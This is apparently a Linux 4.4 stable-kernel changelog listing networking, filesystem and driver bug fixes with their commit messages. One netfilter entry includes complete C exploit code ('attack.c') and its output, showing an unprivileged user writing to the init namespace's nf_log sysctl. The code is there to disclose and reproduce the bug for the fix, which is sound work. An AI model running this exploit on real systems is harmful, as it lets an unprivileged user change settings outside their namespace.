346da62cc186c4b4b1ac59f87f4482b47a047388 ]
Andrey reported following warning while fuzzing with syzkaller
WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...
CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<
ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
[<
ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
[<
ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
[<
ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[<
ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
[<
ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
[<
ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
[<
ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
[<
ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
[<
ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
[<
ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
[<
ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
[< inline >] exit_task_work include/linux/task_work.h:21
[<
ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
[<
ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
[<
ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
[<
ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
[<
ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
[< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190
[<
ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
[<
ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
(ftrace buffer empty)
Kernel Offset: disabled
Fix this the same way we did for TCP in commit
565b7b2d2e63
("tcp: do not send reset to already closed sockets")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Wed, 2 Nov 2016 14:53:17 +0000 (07:53 -0700)]
tcp: fix potential memory corruption
[ Upstream commit
ac9e70b17ecd7c6e933ff2eaf7ab37429e71bf4d ]
Imagine initial value of max_skb_frags is 17, and last
skb in write queue has 15 frags.
Then max_skb_frags is lowered to 14 or smaller value.
tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.
Fixes:
5f74f82ea34c ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eli Cooper [Tue, 1 Nov 2016 15:45:12 +0000 (23:45 +0800)]
ip6_tunnel: Clear IP6CB in ip6tunnel_xmit()
[ Upstream commit
23f4ffedb7d751c7e298732ba91ca75d224bc1a6 ]
skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.
This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.
Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Andy Gospodarek [Mon, 31 Oct 2016 17:32:03 +0000 (13:32 -0400)]
bgmac: stop clearing DMA receive control register right after it is set
[ Upstream commit
fcdefccac976ee51dd6071832b842d8fb41c479c ]
Current bgmac code initializes some DMA settings in the receive control
register for some hardware and then immediately clears those settings.
Not clearing those settings results in ~420Mbps *improvement* in
throughput; this system can now receive frames at line-rate on Broadcom
5871x hardware compared to ~520Mbps today. I also tested a few other
values but found there to be no discernible difference in CPU
utilization even if burst size and prefetching values are different.
On the hardware tested there was no need to keep the code that cleared
all but bits 16-17, but since there is a wide variety of hardware that
used this driver (I did not look at all hardware docs for hardware using
this IP block), I find it wise to move this call up and clear bits just
after reading the default value from the hardware rather than completely
removing it.
This is a good candidate for -stable >=3.14 since that is when the code
that was supposed to improve performance (but did not) was introduced.
Signed-off-by: Andy Gospodarek <gospo@broadcom.com>
Fixes:
56ceecde1f29 ("bgmac: initialize the DMA controller of core...")
Cc: Hauke Mehrtens <hauke@hauke-m.de>
Acked-by: Hauke Mehrtens <hauke@hauke-m.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Sat, 29 Oct 2016 18:02:36 +0000 (11:02 -0700)]
net: mangle zero checksum in skb_checksum_help()
[ Upstream commit
4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 ]
Sending zero checksum is ok for TCP, but not for UDP.
UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.
Simply replace such checksum by 0xffff, regardless of transport.
This error was caught on SIT tunnels, but seems generic.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Fri, 28 Oct 2016 20:40:24 +0000 (13:40 -0700)]
net: clear sk_err_soft in sk_clone_lock()
[ Upstream commit
e551c32d57c88923f99f8f010e89ca7ed0735e83 ]
At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.
Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Florian Westphal [Fri, 28 Oct 2016 16:43:11 +0000 (18:43 +0200)]
dctcp: avoid bogus doubling of cwnd after loss
[ Upstream commit
ce6dd23329b1ee6a794acf5f7e40f8e89b8317ee ]
If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to
tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);
... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.
This can cause severe growth of cwnd (eventually overflowing u32).
Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.
Fixes:
e3118e8359bb7c ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Fri, 18 Nov 2016 09:49:03 +0000 (10:49 +0100)]
Linux 4.4.33
Jann Horn [Sun, 18 Sep 2016 19:40:55 +0000 (21:40 +0200)]
netfilter: fix namespace handling in nf_log_proc_dostring
commit
dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[
1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Goldwyn Rodrigues [Fri, 30 Sep 2016 15:40:52 +0000 (10:40 -0500)]
btrfs: qgroup: Prevent qgroup->reserved from going subzero
commit
0b34c261e235a5c74dcf78bd305845bd15fe2b42 upstream.
While free'ing qgroup->reserved resources, we much check if
the page has not been invalidated by a truncate operation
by checking if the page is still dirty before reducing the
qgroup resources. Resources in such a case are free'd when
the entire extent is released by delayed_ref.
This fixes a double accounting while releasing resources
in case of truncating a file, reproduced by the following testcase.
SCRATCH_DEV=/dev/vdb
SCRATCH_MNT=/mnt
mkfs.btrfs -f $SCRATCH_DEV
mount -t btrfs $SCRATCH_DEV $SCRATCH_MNT
cd $SCRATCH_MNT
btrfs quota enable $SCRATCH_MNT
btrfs subvolume create a
btrfs qgroup limit 500m a $SCRATCH_MNT
sync
for c in {1..15}; do
dd if=/dev/zero bs=1M count=40 of=$SCRATCH_MNT/a/file;
done
sleep 10
sync
sleep 5
touch $SCRATCH_MNT/a/newfile
echo "Removing file"
rm $SCRATCH_MNT/a/file
Fixes:
b9d0b38928 ("btrfs: Add handler for invalidate page")
Signed-off-by: Goldwyn Rodrigues <rgoldwyn@suse.com>
Reviewed-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Fabio Estevam [Sat, 5 Nov 2016 19:45:07 +0000 (17:45 -0200)]
mmc: mxs: Initialize the spinlock prior to using it
commit
f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.
An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.
In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.
Fixes:
e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Chen-Yu Tsai [Mon, 31 Oct 2016 06:42:09 +0000 (14:42 +0800)]
ASoC: sun4i-codec: return error code instead of NULL when create_card fails
commit
85915b63ad8b796848f431b66c9ba5e356e722e5 upstream.
When sun4i_codec_create_card fails, we do not assign a proper error
code to the return value. The return value would be 0 from the previous
function call, or we would have bailed out sooner. This would confuse
the driver core into thinking the device probe succeeded, when in fact
it didn't, leaving various devres based resources lingering.
Make the create_card function pass back a meaningful error code, and
assign it to the return value.
Fixes:
45fb6b6f2aa3 ("ASoC: sunxi: add support for the on-chip codec on
early Allwinner SoCs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Punit Agrawal [Tue, 18 Oct 2016 16:07:19 +0000 (17:07 +0100)]
ACPI / APEI: Fix incorrect return value of ghes_proc()
commit
806487a8fc8f385af75ed261e9ab658fc845e633 upstream.
Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.
Fixes:
d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <punit.agrawa.@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Huaibin Wang [Mon, 26 Sep 2016 07:51:18 +0000 (09:51 +0200)]
i40e: fix call of ndo_dflt_bridge_getlink()
commit
599b076d15ee3ead7af20fc907079df00b2d59a0 upstream.
Order of arguments is wrong.
The wrong code has been introduced by commit
7d4f8d871ab1, but is compiled
only since commit
9df70b66418e.
Note that this may break netlink dumps.
Fixes:
9df70b66418e ("i40e: Remove incorrect #ifdef's")
Fixes:
7d4f8d871ab1 ("switchdev; add VLAN support for port's bridge_getlink")
CC: Carolyn Wyborny <carolyn.wyborny@intel.com>
Signed-off-by: Huaibin Wang <huaibin.wang@6wind.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Tested-by: Andrew Bowers <andrewx.bowers@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Andrew Lutomirski [Mon, 17 Oct 2016 17:06:27 +0000 (10:06 -0700)]
hwrng: core - Don't use a stack buffer in add_early_randomness()
commit
6d4952d9d9d4dc2bb9c0255d95a09405a1e958f7 upstream.
hw_random carefully avoids using a stack buffer except in
add_early_randomness(). This causes a crash in virtio_rng if
CONFIG_VMAP_STACK=y.
Reported-by: Matt Mullins <mmullins@mmlx.us>
Tested-by: Matt Mullins <mmullins@mmlx.us>
Fixes:
d3cc7996473a ("hwrng: fetch randomness only after device init")
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Daniel Mentz [Fri, 28 Oct 2016 00:46:59 +0000 (17:46 -0700)]
lib/genalloc.c: start search from start of chunk
commit
62e931fac45b17c2a42549389879411572f75804 upstream.
gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.
The shortcut
if (size > atomic_read(&chunk->avail))
continue;
makes the loop skip over chunks that do not have enough bytes left to
fulfill the request. There are two situations, though, where an
allocation might still fail:
(1) The available memory is not contiguous, i.e. the request cannot
be fulfilled due to external fragmentation.
(2) A race condition. Another thread runs the same code concurrently
and is quicker to grab the available memory.
In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed. This return value is then assigned to
start_bit. The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched. Today, the code fails to reset start_bit to 0. As a
result, prefixes of subsequent chunks are ignored. Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.
Fixes:
7f184275aa30 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alexander Usyskin [Mon, 31 Oct 2016 17:02:39 +0000 (19:02 +0200)]
mei: bus: fix received data size check in NFC fixup
commit
582ab27a063a506ccb55fc48afcc325342a2deba upstream.
NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.
That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2
Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57
Fixes:
59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Joerg Roedel [Tue, 8 Nov 2016 14:08:26 +0000 (15:08 +0100)]
iommu/vt-d: Fix dead-locks in disable_dmar_iommu() path
commit
bea64033dd7b5fb6296eda8266acab6364ce1554 upstream.
It turns out that the disable_dmar_iommu() code-path tried
to get the device_domain_lock recursivly, which will
dead-lock when this code runs on dmar removal. Fix both
code-paths that could lead to the dead-lock.
Fixes:
55d940430ab9 ('iommu/vt-d: Get rid of domain->iommu_lock')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Baoquan He [Thu, 15 Sep 2016 08:50:52 +0000 (16:50 +0800)]
iommu/amd: Free domain id when free a domain of struct dma_ops_domain
commit
c3db901c54466a9c135d1e6e95fec452e8a42666 upstream.
The current code missed freeing domain id when free a domain of
struct dma_ops_domain.
Signed-off-by: Baoquan He <bhe@redhat.com>
Fixes:
ec487d1a110a ('x86, AMD IOMMU: add domain allocation and deallocation functions')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Richard Genoud [Thu, 27 Oct 2016 16:04:06 +0000 (18:04 +0200)]
tty/serial: at91: fix hardware handshake on Atmel platforms
commit
9bcffe7575b721d7b6d9b3090fe18809d9806e78 upstream.
After commit
1cf6e8fc8341 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), the hardware handshake wasn't
functional anymore on Atmel platforms (beside SAMA5D2).
To understand why, one has to understand the flag ATMEL_US_USMODE_HWHS
first:
Before commit
1cf6e8fc8341 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), this flag was never set.
Thus, the CTS/RTS where only handled by serial_core (and everything
worked just fine).
This commit introduced the use of the ATMEL_US_USMODE_HWHS flag,
enabling it for all boards when the user space enables flow control.
When the ATMEL_US_USMODE_HWHS is set, the Atmel USART controller
handles a part of the flow control job:
- disable the transmitter when the CTS pin gets high.
- drive the RTS pin high when the DMA buffer transfer is completed or
PDC RX buffer full or RX FIFO is beyond threshold. (depending on the
controller version).
NB: This feature is *not* mandatory for the flow control to work.
(Nevertheless, it's very useful if low latencies are needed.)
Now, the specifics of the ATMEL_US_USMODE_HWHS flag:
- For platforms with DMAC and no FIFOs (sam9x25, sam9x35, sama5D3,
sama5D4, sam9g15, sam9g25, sam9g35)* this feature simply doesn't work.
( source: https://lkml.org/lkml/2016/9/7/598 )
Tested it on sam9g35, the RTS pins always stays up, even when RXEN=1
or a new DMA transfer descriptor is set.
=> ATMEL_US_USMODE_HWHS must not be used for those platforms
- For platforms with a PDC (sam926{0,1,3}, sam9g10, sam9g20, sam9g45,
sam9g46)*, there's another kind of problem. Once the flag
ATMEL_US_USMODE_HWHS is set, the RTS pin can't be driven anymore via
RTSEN/RTSDIS in USART Control Register. The RTS pin can only be driven
by enabling/disabling the receiver or setting RCR=RNCR=0 in the PDC
(Receive (Next) Counter Register).
=> Doing this is beyond the scope of this patch and could add other
bugs, so the original (and working) behaviour should be set for those
platforms (meaning ATMEL_US_USMODE_HWHS flag should be unset).
- For platforms with a FIFO (sama5d2)*, the RTS pin is driven according
to the RX FIFO thresholds, and can be also driven by RTSEN/RTSDIS in
USART Control Register. No problem here.
(This was the use case of commit
1cf6e8fc8341 ("tty/serial: at91: fix
RTS line management when hardware handshake is enabled"))
NB: If the CTS pin declared as a GPIO in the DTS, (for instance
cts-gpios = <&pioA PIN_PB31 GPIO_ACTIVE_LOW>), the transmitter will be
disabled.
=> ATMEL_US_USMODE_HWHS flag can be set for this platform ONLY IF the
CTS pin is not a GPIO.
So, the only case when ATMEL_US_USMODE_HWHS can be enabled is when
(atmel_use_fifo(port) &&
!mctrl_gpio_to_gpiod(atmel_port->gpios, UART_GPIO_CTS))
Tested on all Atmel USART controller flavours:
AT91SAM9G35-CM (DMAC flavour), AT91SAM9G20-EK (PDC flavour),
SAMA5D2xplained (FIFO flavour).
* the list may not be exhaustive
Fixes:
1cf6e8fc8341 ("tty/serial: at91: fix RTS line management when hardware handshake is enabled")
Signed-off-by: Richard Genoud <richard.genoud@gmail.com>
Acked-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Acked-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
[nicolas.ferre@atmel.com: adapt to 4.4.x kernel for stable by adding
the atmel_port variable declaration which was missing]
Signed-off-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Ludovic Desroches [Mon, 23 Nov 2015 13:09:39 +0000 (14:09 +0100)]
dmaengine: at_xdmac: fix spurious flag status for mem2mem transfers
commit
95da0c19d164f6df0b71a5187950f47d4b746e91 upstream.
When setting the channel configuration register, the perid field is not
set to 0 since it is useless for mem2mem transfers. Unfortunately, a
device has 0 as perid. It could cause spurious flags status because
the controller could mix some events from the two channels.
For that reason, use the highest perid value for mem2mem transfers since it
doesn't match the perid of other devices.
Signed-off-by: Ludovic Desroches <ludovic.desroches@atmel.com>
Acked-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Ville Syrjälä [Tue, 11 Oct 2016 17:52:46 +0000 (20:52 +0300)]
drm/i915: Respect alternate_ddc_pin for all DDI ports
commit
8d83bc22b259e5526625b6d298f637786c71129f upstream.
The VBT provides the platform a way to mix and match the DDI ports vs.
GMBUS pins. Currently we only trust the VBT for DDI E, which I suppose
has no standard GMBUS pin assignment. However, there are machines out
there that use a non-standard mapping for the other ports as well.
Let's start trusting the VBT on this one for all ports on DDI platforms.
I've structured the code such that other platforms could easily start
using this as well, by simply filling in the ddi_port_info. IIRC there
may be CHV system that might actually need this.
v2: Include a commit message, include a debug message during init
Cc: Maarten Maathuis <madman2003@gmail.com>
Tested-by: Maarten Maathuis <madman2003@gmail.com>
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97877
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476208368-5710-3-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Jim Bride <jim.bride@linux.intel.com>
(cherry picked from commit
e4ab73a13291fc844c9e24d5c347bd95818544d2)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
James Hogan [Tue, 25 Oct 2016 15:11:12 +0000 (16:11 +0100)]
KVM: MIPS: Precalculate MMIO load resume PC
commit
e1e575f6b026734be3b1f075e780e91ab08ca541 upstream.
The advancing of the PC when completing an MMIO load is done before
re-entering the guest, i.e. before restoring the guest ASID. However if
the load is in a branch delay slot it may need to access guest code to
read the prior branch instruction. This isn't safe in TLB mapped code at
the moment, nor in the future when we'll access unmapped guest segments
using direct user accessors too, as it could read the branch from host
user memory instead.
Therefore calculate the resume PC in advance while we're still in the
right context and save it in the new vcpu->arch.io_pc (replacing the no
longer needed vcpu->arch.pending_load_cause), and restore it on MMIO
completion.
Fixes:
e685c689f3a8 ("KVM/MIPS32: Privileged instruction/target branch emulation.")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
[james.hogan@imgtec.com: Backport to 3.18..4.4]
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Sreekanth Reddy [Fri, 28 Oct 2016 04:39:12 +0000 (10:09 +0530)]
scsi: mpt3sas: Fix for block device of raid exists even after deleting raid disk
commit
6d3a56ed098566bc83d6c2afa74b4199c12ea074 upstream.
While merging mpt3sas & mpt2sas code, we added the is_warpdrive check
condition on the wrong line
---------------------------------------------------------------------------
scsih_target_alloc(struct scsi_target *starget)
sas_target_priv_data->handle = raid_device->handle;
sas_target_priv_data->sas_address = raid_device->wwid;
sas_target_priv_data->flags |= MPT_TARGET_FLAGS_VOLUME;
- raid_device->starget = starget;
+ sas_target_priv_data->raid_device = raid_device;
+ if (ioc->is_warpdrive)
+ raid_device->starget = starget;
}
spin_unlock_irqrestore(&ioc->raid_device_lock, flags);
return 0;
------------------------------------------------------------------------------
That check should be for the line sas_target_priv_data->raid_device =
raid_device;
Due to above hunk, we are not initializing raid_device's starget for
raid volumes, and so during raid disk deletion driver is not calling
scsi_remove_target() API as driver observes starget field of
raid_device's structure as NULL.
Signed-off-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Fixes:
7786ab6aff9 ("mpt3sas: Ported WarpDrive product SSS6200 support")
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Bill Kuzeja [Fri, 21 Oct 2016 20:45:27 +0000 (16:45 -0400)]
scsi: qla2xxx: Fix scsi scan hang triggered if adapter fails during init
commit
a5dd506e1584e91f3e7500ab9a165aa1b49eabd4 upstream.
A system can get hung task timeouts if a qlogic board fails during
initialization (if the board breaks again or fails the init). The hang
involves the scsi scan.
In a nutshell, since commit
beb9e315e6e0 ("qla2xxx: Prevent removal and
board_disable race"):
...it is possible to have freed ha (base_vha->hw) early by a call to
qla2x00_remove_one when pdev->enable_cnt equals zero:
if (!atomic_read(&pdev->enable_cnt)) {
scsi_host_put(base_vha->host);
kfree(ha);
pci_set_drvdata(pdev, NULL);
return;
Almost always, the scsi_host_put above frees the vha structure
(attached to the end of the Scsi_Host we're putting) since it's the last
put, and life is good. However, if we are entering this routine because
the adapter has broken sometime during initialization AND a scsi scan is
already in progress (and has done its own scsi_host_get), vha will not
be freed. What's worse, the scsi scan will access the freed ha structure
through qla2xxx_scan_finished:
if (time > vha->hw->loop_reset_delay * HZ)
return 1;
The scsi scan keeps checking to see if a scan is complete by calling
qla2xxx_scan_finished. There is a timeout value that limits the length
of time a scan can take (hw->loop_reset_delay, usually set to 5
seconds), but this definition is in the data structure (hw) that can get
freed early.
This can yield unpredictable results, the worst of which is that the
scsi scan can hang indefinitely. This happens when the freed structure
gets reused and loop_reset_delay gets overwritten with garbage, which
the scan obliviously uses as its timeout value.
The fix for this is simple: at the top of qla2xxx_scan_finished, check
for the UNLOADING bit in the vha structure (_vha is not freed at this
point). If UNLOADING is set, we exit the scan for this adapter
immediately. After this last reference to the ha structure, we'll exit
the scan for this adapter, and continue on.
This problem is hard to hit, but I have run into it doing negative
testing many times now (with a test specifically designed to bring it
out), so I can verify that this fix works. My testing has been against a
RHEL7 driver variant, but the bug and patch are equally relevant to to
the upstream driver.
Fixes:
beb9e315e6e0 ("qla2xxx: Prevent removal and board_disable race")
Signed-off-by: Bill Kuzeja <william.kuzeja@stratus.com>
Acked-by: Himanshu Madhani <himanshu.madhani@cavium.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
